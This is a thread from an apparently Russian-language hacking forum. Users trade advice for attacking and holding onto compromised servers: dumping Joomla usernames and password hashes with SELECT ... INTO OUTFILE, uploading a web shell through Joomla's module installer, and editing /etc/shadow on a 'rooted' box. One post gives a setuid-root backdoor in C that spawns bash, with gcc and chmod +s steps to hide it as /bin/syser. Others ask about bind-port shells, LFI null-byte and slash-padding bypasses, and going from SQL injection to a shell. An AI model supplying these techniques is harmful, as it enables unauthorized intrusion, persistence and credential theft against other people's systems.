я бы сделал слегка поизвращенски: 1) восстановил бы таблицу на локалке 2) сделал чтото типа такого запроса: SELECT group_concat(username,password separator '\n\r') FROM `jos_users` into outfile 'C:/1111.txt'
Как заливается шелл в Joomla? <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> 5.0.45-community-nt:root@localhost:Win32 Доступ к админке есть.
если нет ограничений в виде прав на папки то в установке модулей либо ставишь xplorer ..либо сразу шелл льешь..даже если ошибка будет..он по идее должен залится
пожалуйста у кого есть машина под линуксе с перлом сгенерируете для меня хеш пароля 123456 Code: #!/usr/bin/perl ################################################################################ # Generate an MD5 hash for a string. # Created to allow me to set a blank Linux password. Required this to create # multiple VsFTP accounts with anonymous style credientials. # # If all you want is the MD5 Hash for NULL (blank password) here's one... # $1$VNMbpxGH$sew7cnwH9ixU.x27UbFNn. # # Advice: If replacing a Linux password with a blank string, ensure you give # the user a shell of /sbin/nologin as you wouldn't want them to login! ################################################################################ # Load dependancies... # perl -MCPAN -e 'install Crypt::PasswdMD5' ################################################################################ use strict; use Crypt::PasswdMD5 qw(unix_md5_crypt); my @salt = ( '.', '/', 0 .. 9, 'A' .. 'Z', 'a' .. 'z' ); my %encrypted; sub abort { print "ABORT: $_[0]\n"; exit 1 } sub gensalt { #------------------------------------------------------------ # uses global @salt to construct salt string of requested length my $count = shift; my $salt; for (1..$count) { $salt .= (@salt)[rand @salt]; } return $salt; } # end gensalt sub get_encryptedpw { #-------------------------------------------------- my $unencrypted="$_[0]"; # generate traditional (weak!) DES password, and more modern md5 $encrypted{des} = crypt( $unencrypted, gensalt(2) ); $encrypted{md5} = unix_md5_crypt( $unencrypted, gensalt(8) ); return %encrypted; } ################################################################################ print "Enter password string to encrypt (can be blank) : "; my $password = <STDIN>; chomp $password; get_encryptedpw($password); print "Plaintext \"$password\" = MD5 Hash: $encrypted{md5}\n"; print "\nReplace the /etc/shadow password string with the above to force pass change\n"; спасибки!
Active perl тебе о чeм то говорит? или ты думаешь что все кто перл юзают, под линухой? погуглить не судьба?
спасибо а вот трабла порутил сервер, uid=0, gid=0, sh-3.2, доступк по телнету (bind port). я смог открыть порт ssh, но не могу понять почему не получается зайти. (добавил пользователь и вручную ставил хеш в /etc/shadow)...authentication failure....не знаю?!
а зачем ты так палишся на серванте то? зачем новый юзверь..., подрубайся к северу через бекдор, если же он упал .создай себе лазейку..сначала сделай файл root.с: Код: Code: main() { setuid(0); setgid(0); system("/bin/bash"); } Далее Код: Code: gcc root.c -o syser chmod 755 syser chmod +s syser mv syser /bin/syser если бекдор закрылся, запускай из шелла заново и запускай : Код: Code: $ /bin/syser id uid=0(root) gid=0(wheel) groups=0(wheel),80(www),1003(suwww)
раз ты "порутил" сервак, значит доступ у тебя к нему есть...какая проблема залить шелл (если веб-сервак) или bindport.pl и запустить?
так пхп шелл я давно залил, делал bindport, подключился (telnet), порутил. и как дальше доступк к ssh получить?
ей Богу тебя не понимаю я...зачем тебе ssh ? какая разница что консоль у тебя на 22 или на 31337 порту?
ой разница большая, на 11457 порту шелл не bash а sh, нету TERM терминала, а это ограничает мой возможности (например passwd не могу выполнить потому-что он не ждет пока я пасс напишу а уже пишет "Retype unix password") и разные Pseudo-terminal will not be allocated because stdin is not a ...
Здравствуйте. Есть некий сайт, там присутствует local file inclusion, которая дописывает расширение .php. В чем вопрос, знаю можно попытаться отбросить нуль байтом, но когда я пытаюсь это сделать ничего не происходит, еще слышал о 4096 слешах, но даже при их добавлении пишет "Failed opening путь/passwd//////[много слешей]", без расширения. Подскажите пожалуйста что делать.
Есть раскрученная инъекция, получил login:hash из mysql.user (хэш не могу сбрутить), mysql из под root, есть конфиг апача и etc/passwd (только пасов в нем нет). Какие сейчас есть варианты получения шела?
